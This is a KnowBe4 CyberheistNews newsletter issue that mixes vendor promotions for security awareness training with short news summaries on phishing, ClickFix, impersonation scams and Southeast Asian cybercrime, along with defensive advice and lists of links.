CyberheistNews Vol 15 #27 Is Your Human Risk Management Program Really Making a Difference? Measure It Now

Is Your Human Risk Management Program Really Making a Difference? Measure It Now.

Your employees are simultaneously your greatest vulnerability and strongest line of defense. But here's the question: What metrics demonstrate your security awareness efforts are actually building a culture that protects your organization?

The Security Awareness Blind Spot

Many security leaders face a challenging reality:

• You invest in training without clear evidence of effectiveness
• You struggle to demonstrate the value of your program to leadership
• You're uncertain which areas need your limited resources most
• You suspect gaps in your security culture but can't pinpoint them
• You know security frameworks exist, but they're too complex or technical

The result? Uncertainty that creates real dangers for your org while bad actors exploit your blind spots daily.

Introducing the free KnowBe4 Program Maturity Assessment

To address these challenges, we've developed the Program Maturity Assessment (PMA) — a free strategic tool that measures your effectiveness at managing human risk and building a strong security culture.

This straightforward five-minute assessment evaluates your organization across 40 Culture Maturity Indicators spanning ten critical dimensions:

1. Leadership & Strategy: Executive communication and cybersecurity prioritization
2. Employee-focused Security Tools: MFA, password managers and reporting tools
3. Employee Mindset: Ownership of security and learning from mistakes
4. Continuous Improvement: Knowledge sharing and program evolution
5. Risk Awareness: Understanding risks and security impact
6. Awareness & Behaviors: Relevant training and adoption of secure practices
7. Policies & Procedures: Clear policies and efficient incident reporting
8. Measurement & Metrics: Tracking effectiveness and security KPIs
9. Employee Engagement: Participation in initiatives and recognition
10. Integration with Business: Security embedded in daily processes

What You'll Get:

Based on your responses, you'll receive:

• Your Overall Maturity Classification on our five-level scale, from Basic Compliance (Level 1) to Sustainable Security Culture (Level 5)
• Detailed scoring for each dimension with specific strengths and improvement areas
• Visual ranking of your relative performance across all dimensions
• Prioritized recommendations for advancing to the next maturity level
• Practical actions you can implement immediately

Beyond Checkbox Compliance: Build a Real, Effective Security Culture

Unlike technical assessments or complex frameworks that speak in jargon, the PMA specifically addresses the human element of your security in plain English. It cuts through the complexity and gives you a clear path to build a security culture that actually works.

Whether you're just starting your security culture journey or looking to take an established program to the next level, the PMA gives you the structure and guidance needed to systematically strengthen your human defense layer.

Take the First Step Today

Transform your security awareness from checkbox compliance into a measurable culture that actually protects your organization against today's evolving human-targeted threats.

Complete the assessment and you'll immediately receive a comprehensive, actionable report outlining where you are and what key steps you should take to advance to the next level.

If this aligns with your organization's goals, you can schedule a call with our team to walk through how KnowBe4's HRM+ Platform can help boost your maturity and create a sustainable path forward.

Take the free assessment today:
https://www.knowbe4.com/free-cybersecurity-tools/program-maturity-assessment

[Live Demo] Ridiculously Easy AI-Powered Security Awareness Training and Phishing

Phishing and social engineering remain the #1 cyber threat to your organization, with 68% of data breaches caused by human error. Your security team needs an easy way to deliver personalized training—this is precisely what our AI Defense Agents provide.

Join us for a demo showcasing KnowBe4's leading-edge approach to human risk management with agentic AI that delivers personalized, relevant and adaptive security awareness training with minimal admin effort.

See how easy it is to train and phish your users with KnowBe4's HRM+ platform:

• SmartRisk Agent™ - Generate actionable data and metrics to help you lower your organization's human risk score
• Template Generator Agent - Create convincing phishing simulations, including Callback Phishing, that mimic real threats. The Recommended Landing Pages Agent then suggests appropriate landing pages based on AI-generated templates
• Automated Training Agent - Automatically identify high-risk users and assign personalized training
• Knowledge Refresher Agent and Policy Quizzes Agent - Reinforce your security program and organizational policies.
• Enhanced Executive Reports - Track user activities, visualize trends, download widgets, and improve searching/sorting to provide deeper insights and streamline collaboration

See how these powerful AI-driven features work together to dramatically reduce your organization's risk while saving your team valuable time.

Date/Time: TOMORROW, Wednesday, July 9, @ 2:00 PM (ET)

Save My Spot:
https://info.knowbe4.com/kmsat-demo-1?partnerref=CHN3

What Makes Southeast Asia the "Ground Zero of Cybercrime"?

By Bex Bailey

Our 2025 Phishing By Industry Benchmarking Report examines why organizations across Asia face some of the highest levels of cybersecurity risk worldwide.

In fact, Forrester reveals that organizations in Asia Pacific (APAC) experience an average of 3.5 breaches within a 12-month period versus 2.8 globally. Organizations in the region also experience a cumulative cost of $2.8 million against the global mean of $2.7 million.

There are numerous factors that contribute to this elevated risk — from rapid, yet incredibly uneven, digital transformation, to an over-reliance on third-party suppliers (who are also undergoing their own digital transformations).

Other regions face similar challenges to these: organizations in Africa and South America, for example, also operate within complex maps of digitalization.

However, one factor we highlighted in the report is Southeast Asia's incredibly unique status as "Ground Zero" for cybercrime.

In October 2024, the United Nations Office on Drugs and Crime (UNODC) published a report stating that transnational organized crime in the region is evolving faster than ever before, with cyber-enabled fraud highlighted as one of two areas experiencing intense growth.

In fact, the UNODC estimates that victims in East and Southeast Asia have experienced financial losses between US$18 billion and US$37 billion related to cyber-enabled fraud.

Notably, the UNODC also states that a "predominant proportion" of these losses were attributed to scams run by organized crime groups also located in Southeast Asia.

Several countries in Southeast Asia, particularly those in the Mekong, region have become a "testing ground" for transnational criminal networks, with Asian crime syndicates diversifying their "business lines" to now include malware, generative AI, and deepfakes into their operations.

In a second report, published in April 2025, the UNODC describes how cyber-enabled fraud and scam centers have reached "industrial scale." Underpinning these activities are sophisticated and interconnected networks of money launderers, human traffickers, data brokers and other specialist service providers.

[CONTINUED]
https://blog.knowbe4.com/what-makes-southeast-asia-the-ground-zero-of-cybercrime

[NEW WEBINAR] Ransomware Reality Check: Busting Cybersecurity Myths

Join us for an engaging and interactive webinar where we put ransomware myths to the test! This unique session combines the analytical approach to the most persistent discussions surrounding ransomware attacks and YOU decide whether they hold weight.

KnowBe4 cybersecurity experts, Javvad Malik and Erich Kron, will go head-to-head to debate the facts, presenting evidence, real-world case studies and expert opinions, on controversial ransomware topics. Should you:

• Ever negotiate with ransomware groups?
• Prioritize prevention or recovery?
• Be required to disclose ransom payments?
• Face legal consequences for making ransomware payments?
• Hire former black hat actors as consultants?

But here's where it gets interesting: YOU get the deciding vote! After each debate, you will vote on which argument was most compelling and maybe even walk away from it thinking about ransomware in a new light. Plus earn CPE credit for attending!

Date/Time: Wednesday, July 16 @ 2:00 PM (ET)

Can't attend live? No worries — register now and you will receive a link to view the presentation on-demand afterwards.

Save My Spot:
https://info.knowbe4.com/ransomware-webinar-2025?partnerref=CHN

Crooks Are Using Generative AI to Craft Phishing Pages Almost Instantly

Researchers at Okta warn that cybercriminals are abusing a generative AI tool from Vercel to easily create credential-harvesting phishing pages. The tool, dubbed "v0," is designed to allow users to create websites via natural language prompts. Threat actors can use the tool to generate working phishing pages in under a minute.

"Okta Threat Intelligence has observed threat actors abusing v0, a breakthrough Generative Artificial Intelligence (GenAI) tool created by Vercel, to develop phishing sites that impersonate legitimate sign-in webpages," Okta writes.

"This observation signals a new evolution in the weaponization of Generative AI by threat actors who have demonstrated an ability to generate a functional phishing site from simple text prompts. Okta researchers were able to reproduce our observations."

Vercel has since blocked the sites and is working to prevent such misuse, but Okta notes that the activity shows that threat actors are eager to use AI tools to assist in their attacks.

"The observed activity confirms that today's threat actors are actively experimenting with and weaponizing leading GenAI tools to streamline and enhance their phishing capabilities," the researchers write. "The use of a platform like Vercel's v0.dev allows emerging threat actors to rapidly produce high-quality, deceptive phishing pages, increasing the speed and scale of their operations.

In addition to Vercel's v0.dev platform, various public GitHub repositories offer direct clones of the v0.dev application or do-it-yourself (DIY) guides for building bespoke generative tools. This open-source proliferation effectively democratizes advanced phishing capabilities, providing the tools for adversaries to create their own phishing infrastructure."

New-school security awareness training gives your organization an essential layer of defense against evolving social engineering attacks. KnowBe4 empowers your workforce to make smarter security decisions every day. Over 70,000 organizations worldwide trust the KnowBe4 HRM+ platform to strengthen their security culture and reduce human risk.

Okta has the story:
https://www.okta.com/newsroom/articles/okta-observes-v0-ai-tool-used-to-build-phishing-sites/

Registration is Open for KB4-CON EMEA | London

Exciting news — registration is now open for KB4-CON EMEA, our premier event for IT and cybersecurity professionals! Join us 23 October, 2025, at 200 Aldersgate in London.

Explore the world of human risk management, AI and adaptive defense strategies at this annual conference where industry leaders gather to shape the future of security.

At KB4-CON, you'll:

• EXCEL: Dive deep into KnowBe4's product roadmap and latest updates
• GROW: Expand your security expertise, build valuable connections
• GET INSPIRED: Gain insights from top cybersecurity leaders and innovators

This is your opportunity to transform your approach to managing human risk and strengthen your security culture.

Save your spot today and secure early bird pricing of £69! Full price starting 1 August, 2025, is £99. Plus, take advantage of our buy 2 tickets, get 1 free offer and bring your colleagues to maximize your team's experience*.

Don't miss out on the cybersecurity event of the year!

Save My Spot!
https://knowbe4.cventevents.com/RMXXd0?RefId=CHN+Email

Warning: Impersonation Attacks Are Surging

Impersonation scams have risen by 148% over the past year, according to a new report from the Identity Theft Resource Center (ITRC). The majority of these scams posed as businesses or financial entities and attempted to trick victims into handing over credentials or other sensitive information.

"Scammers typically impersonated a business (51% of impersonation scams) or a financial institution (21%), with increased reports of impersonation in both categories," the report says. "While the next highest category of impersonation was a federal/state agency, there was a 32 percent (32%) decrease in reports of impersonation of a government agency compared to the same timeframe in the previous year."

The ITRC warns that cybercriminals are using AI tools to improve upon and scale their social engineering attacks. "Tactics used to lure victims into a scam include using AI to spoof legitimate websites, posting ads on search engines with fake customer service numbers for well-known businesses or sending legitimate-looking emails that pretend to be from a large company," the researchers write.

"They also send text messages that seem to come from legitimate sources. AI tools allow scammers to operate on a much larger scale and target more victims efficiently." The report adds that these attacks will only improve as AI tools grow more sophisticated.

"As AI-generated content becomes more realistic, it becomes more difficult to identify and block fraudulent attempts," the researchers write. "And the thieves don't just ask for money. They will work to get as many personal identifiers as possible to take over accounts, establish new ones or sell the information to make money."

Infosecurity Magazine has the story:
https://www.infosecurity-magazine.com/news/reported-impersonation-scams-surge/

Let's stay safe out there.

Warm Regards,

Stu Sjouwerman, SACP
Founder and Exec Chair
KnowBe4, Inc.

PS: [INC Mag BUDGET AMMO] - Human Risk Management Can Fix the Most Unpatchable Threat:
https://www.inc.com/stu-sjouwerman/human-risk-management-can-fix-the-most-unpatchable-threat/91208814

You can read CyberheistNews online at our Blog
https://blog.knowbe4.com/cyberheistnews-vol-15-27-is-your-human-risk-management-program-really-making-a-difference-measure-it-now

ClickFix Social Engineering Attacks Surge by More Than 500%

Researchers at ESET warn that the ClickFix social engineering tactic surged by 517% during the first six months of 2025. ClickFix is a technique that tricks users into copying, pasting and running malicious commands on their computers, usually resulting in malware installation.

"One of the most striking developments this period was the emergence of ClickFix, a new, deceptive attack vector that skyrocketed by over 500% compared to H2 2024 in ESET telemetry," ESET says. "Now the second most common attack vector after phishing, ClickFix manipulates internet users into executing malicious commands under the guise of fixing a fake error. The payloads at the end of ClickFix attacks vary widely – from infostealers to ransomware and even to nation-state malware – making this a versatile and formidable threat across Windows, Linux and macOS."

ClickFix will certainly continue growing in popularity, as the technique is now being incorporated into commodity phishing tools. Users across all operating systems should be aware of the tactic.

"While Windows users are the largest group affected, macOS and Linux users have also come into the crosshairs," ESET says. "For macOS, public reports reveal that ClickFix campaigns dropped AMOS stealer. For Linux, APT36 was seen redirecting victims to a counterfeit CAPTCHA page that instructed them to run the malicious code via the Alt+F2 shortcut that, on most Linux distributions, opens a Run Command dialog."

Dušan Lacika, a Senior Detection Engineer at ESET, explained, "What makes this new social engineering technique effective is that it is simple enough for the victim to follow the instructions, believable enough to look like it might fix a made-up problem, and abuses the probability that victims won't pay much attention to the exact commands they have been asked to paste and execute on their device. It is also a good example of how threat actors quickly adopt new techniques, once they prove to yield results."

New-school security awareness training can help your employees defend themselves against evolving social engineering tactics. KnowBe4 empowers your workforce to make smarter security decisions every day.

ESET has the story:
https://www.welivesecurity.com/en/eset-research/eset-threat-report-h1-2025/

Phishing Campaign Targets Investment Firms and Advisors

Phishing attacks are impersonating the U.S. Securities and Exchange Commission (SEC) to target SEC-registered financial services firms and advisors, according to an alert from ACA Group. The emails purport to come from the SEC's Chief Information Officer, and ask users to send a reply.

If a user responds, the scammers will target them with further attacks. "All messages claim to be from David Bottom, the Chief Information Officer at the SEC, though some messages truncate his last name," ACA Group says. "The messages ask the recipient to reply and confirm their email address to enable future secure communications.

"This is a common form of 'pretexting' that is used in phishing scams to verify active contacts and build trust in future interactions. Since this message was benign, the recipient is more likely to interact with the next message, which will likely redirect to a harmful site, trick them into downloading malware, or result in some other harm."

ACA Group offers the following advice to help users avoid falling for these attacks:

• "Not click any links in the email or open any attachments. Immediately escalate the issue to the firm's IT team.
• Not respond to or reply to the email.
• Confirm the validity of the email by contacting a trusted SEC representative using verified contact information. Do not use the details provided in the suspicious email—instead refer to contact information listed on the SEC's website or from another reliable source your firm already uses.
• Reach out to trusted cyber advisors to alert them of the issue and seek further guidance.
• Never trust the 'From' field in an email. Always check the email address itself and don't rely on the sender's name alone.
• Do not download attachments from an unsolicited source.
• Be cautious of alarmist email subject lines (e.g., 'urgent', 'transfer', 'request', etc.).
• Create bookmarks for frequently visited websites to avoid visiting fake websites.
• Contact the IT department when in doubt about unknown and suspicious emails or links.
• Validate email requests with callbacks to a contact you have on file or visit a legitimate website to find a callback number."

KnowBe4 empowers your workforce to make smarter security decisions every day.

ACA Group has the story:
https://www.acaglobal.com/industry-insights/active-phishing-campaign-impersonating-the-sec-firms-should-be-on-alert/

1. Europol helps disrupt $540 million crypto investment fraud ring:
   https://www.bleepingcomputer.com/news/security/europol-helps-disrupt-540-million-crypto-investment-fraud-ring/
   
   
2. WSJ: "U.S. Indicts North Koreans in Fake Tech Worker Scam":
   https://www.wsj.com/business/he-thought-an-employee-stole-crypto-the-fbi-says-it-was-a-north-korean-scammer-8aa533a8?
   
   
3. US Justice Department shutters 29(!) suspected North Korean laptop farms:
   https://www.justice.gov/opa/pr/justice-department-announces-coordinated-nationwide-actions-combat-north-korean-remote
   
   
4. Quantus discloses cyberattack amid Scattered Spider aviation breaches:
   https://www.bleepingcomputer.com/news/security/qantas-discloses-cyberattack-amid-scattered-spider-aviation-breaches/
   
   
5. Ransomware gang attacks German charity that feeds starving children:
   https://therecord.media/welthungerhilfe-german-hunger-relief-charity-ransomware-attack
   
   
6. Russian Aeza Group sanctioned for hosting ransomware, infostealer servers:
   https://www.bleepingcomputer.com/news/security/aeza-group-sanctioned-for-hosting-ransomware-infostealer-servers/
   
   
7. LLMs are falling for phishing scams and recommending malicious sites:
   https://www.netcraft.com/blog/large-language-models-are-falling-for-phishing-scams
   
   
8. Scammers are using AI to impersonate travel agents:
   https://www.mcafee.com/blogs/tips-tricks/how-criminals-are-using-ai-to-clone-travel-agents-and-steal-your-money/
   
   
9. Phishing campaign uses thousands of websites to spoof retail brands:
   https://www.silentpush.com/blog/fake-marketplace/
   
   
10. Attackers are increasingly using PDF files in phishing attacks:
    https://blog.talosintelligence.com/pdfs-portable-documents-or-perfect-deliveries-for-phish/
    
    

• Virtual Vaca #1: The Top 12 Waterfalls of Iceland [Amazing Places 4K]:
  https://youtu.be/GhaUmirSYM4
  
  
• Virtual Vaca #2: to Ho Chi Minh city, Vietnam in 4K HDR:
  https://youtu.be/O9fAFuk4V74
  
  
• Virtual Vaca #3: to South Africa in 4K - Incredible Scenes & Uncovering Hidden Gems:
  https://youtu.be/WFnA5WeFIkw
  
  
• Stockhorn Wingsuit BASE Immersive 360 VR. Use your mouse to look around when he flies!:
  https://youtu.be/jB888juHvwQ
  
  
• [SPECIAL] LockPickingLawyer shows the Inside Perspective:
  https://www.youtube.com/watch?v=T_sy3dLwHkc
  
  
• LockPickingLawyer Everbilt's "Keylock Hasp" … a Security Joke?
  https://youtu.be/tBrUJYfCSn8
  
  
• Inside Europe's Most Remote (highest and coldest) Construction Site. WOW:
  https://youtu.be/OVysOYeYbFw
  
  
• [CLASSIC] Magician Fools Penn & Teller with ID Card Magic Trick | Penn & Teller Fool Us:
  https://youtu.be/ysB_0cl31kk
  
  
• Extreme Skills Best Of 2025 (So Far) Long but there are doozies in there:
  https://youtu.be/YSGeOL5MANY
  
  
• Great Swiss Wingsuit Flight Into a Chute:
  https://youtu.be/rNhZl8OuDJc
  
  
• 1930s in Los Angeles, Hollywood in color, sound design added [60fps,Remastered]:
  https://youtu.be/Lop4IZF05aQ
  
  
• Get ready for seven minutes of pure aviation adrenaline as some of the world's top fighter pilots tear through the legendary Mach Loop in Wales:
  https://www.flixxy.com/unforgettable-low-level-jet-flybys-in-4k.htm?utm_source=4
  
  
• For Da Kids #1 - Duck Loves To Go Swimming With Her Favorite Cow:
  https://youtu.be/tQKXhSAphL4
  
  
• For Da Kids #2 - Five Reasons Seals Are Basically Golden Retrievers:
  https://youtu.be/28-Mpkvs8qo
  
  
• For Da Kids #3 - Tiny Kittens Attack This Big Dog… With Love️:
  https://youtu.be/63oD969Ntsk
  
  
• For Da Kids #4 - 40-year-old captive elephant makes her first friend:
  https://youtu.be/RTwUH36pZIQ
  
  
• For Da Kids #5 - Water Buffalo Was Scared Or People, But Now He's A Cuddlebug:
  https://youtu.be/Cd1egzVo_l4